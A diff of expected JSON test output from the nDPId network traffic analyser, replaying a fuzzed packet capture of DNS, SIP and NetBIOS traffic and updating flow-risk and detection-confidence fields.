 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120470966442,"pkt":"AJrtBW69ADBUADRWCABFAJFbeQBAAEARtz7AqAEBwKgBAgA1Cv0AR2c6oAOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGTyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 01437{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":856,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":856,"pkt_l4_len":0,"ts_msec":1120470966443,"pkt":"ADBUADRWAODtAW69CABFAGtKa+kAAIARE\/rAqAEC1PIhIxPEE8QDNtslSU5WSVRFIHNpcDozNTEwNDcyNEBzaXAuY3liZXJraXR5LmRrIFNJUC8yLjANClZpYbcgU0lQLzIuMC9VRFAgMY4yLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTE4ODgyOTgtNDQ4ZTM3NzcxOaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
@@ -1357,7 +1359,7 @@
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":604,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":337}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1120470966852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470966852,"pkt":"ADBUADR2AODtAW69CABFAABIa+sAAIARS2bAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcAJzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470967846,"pkt":"ADBUADRWAODtAW69CABFAABIa+yjAIARS2XAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00403{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470969849,"pkt":"ADBUADRWAODtASVzAABFAABIa+0AAIARS2TAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABGRzaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
@@ -1366,226 +1368,226 @@
 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1120470971822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470971822,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+8AAIARSl7AqAECwKgBJXMAAIkAOls8hV8BEAABAAAAAAAAIUVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470971852,"pkt":"ADBUADRWAODtAW69CABFAGVIa\/AAAIARS2HAqAECwKgBAQr+ADUANOrBPwUBAAABAAAACAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1120470975858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470975858,"pkt":"ADBUADRWAODtAW69CABFAABIa\/IAAIARS1\/AqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaWIEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470798172,"flow_last_seen":1120470806184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1120470796941,"flow_last_seen":1120470966601,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":6699,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1120470796941,"flow_last_seen":1120470966601,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":6699,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00589{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1120470983860,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470983860,"pkt":"ADBUADRWAODtAW69CABFAABEa\/cAAIARS17AqAECwKgBAQr\/ADUAMJu6iQWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120470983861,"pkt":"AODtam69ADBUADRWCABFAABLAABcAEARtz7AqAEBhagBAgA1Cv8AR342iQWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1120470983999,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470983999,"pkt":"ADBUADRWAODtAW69CABFAABIa\/kAAIARS1jAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABOxzaXAEX3VkcANzaHAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
